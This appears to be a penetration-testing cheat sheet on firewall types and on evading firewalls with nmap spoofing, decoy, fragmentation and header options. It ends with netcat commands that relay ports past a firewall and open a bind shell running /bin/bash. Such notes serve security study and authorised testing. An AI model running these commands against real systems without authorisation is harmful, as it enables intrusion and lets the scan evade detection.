# Firewall Handling and Bypassing

## Types

* Packet filtering
* Circuit level gateway
* Stateful inspection
* Proxy
* Next generation firewall
* Cloud firewall and FWaaS

## Rules

* Firewalls follow rules sets configured like in the example below

### Windows

```sh
netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869
```

### Linux

```sh
firewall-cmd --zone=public --add-port=57869/tcp
```

## Bypassing Firewalls

* IP/MAC/Port spoofing
* Fragmentation, MTU, data length
* Header modification

### nmap

* nmap contains multiple measures which can be used to circumvent firewalls securing the target we want to connect to.

#### Spoofing

* __Decoy__ `-D` , shuffle existing IP address with random adresses. Every port will be requested by any of these addresses.
```sh
sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP
```
* __Proxy__
```sh
sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP
```
* __Spoofed MAC__
```sh
sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP
```
* __Spoofed IP__
```sh
sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP
```
* __Port Number__, select a port which is whitelisted. Frequently this is 53,80,44
```sh
sudo nmap -F --source-port 443 $TARGET_IP
```
* __Fragmentation__, eth header + 20 bytes header size +  bytes fragments via `-f`, or 16 bytes via `-ff`
```sh
sudo nmap -Pn -F -f $TARGET_IP
```
* __MTU__, works like fragmentation, `-f` == `--mtu 8`

```sh
sudo nmap -Pn -F --mtu 8 
```
* __DATA Length__, eth header + IP header + prepend padding segment size to values of bytes
```sh
sudo nmap -Pn -F --data-length 64 $TARGET_IP
```

#### Header Fields

* __TTL__
```sh
sudo nmap -Pn -F --ttl 64 $TARGET_IP
```
* __IP OPTIONS__, `--ip-options` recordsas hex String

    * Route, `R`
    * Timestamp, `T`
    * Route + Timestamp, `U`
    * Loose source routing, `L $IP $IP $IP`
    * Strict source routing, `S $IP $IP $IP`

* __Checksum__, craft bad checksum via `--badsum` to check errors
```sh
sudo nmap -Pn -F --badsum $TARGET_IP
```

#### Post FW

After the firewall has been bypassed there are further possible steps to gain foothold. One of them is to open a bind shell on standard ports which are usually not covered by firewall configurations like 443 or 80.

* __Hopping__, listen via netcat to catch that port
* __Tunneling__, relay open after passsing the firewall to connect to the closed port
```sh
nc -lvnp 443 --sh-exec "nc $TARGET_IP 25"
```
* __Non standard ports__, open bin shell via 
```sh
nc -lvnp 8888 -e /bin/bash
```
and connect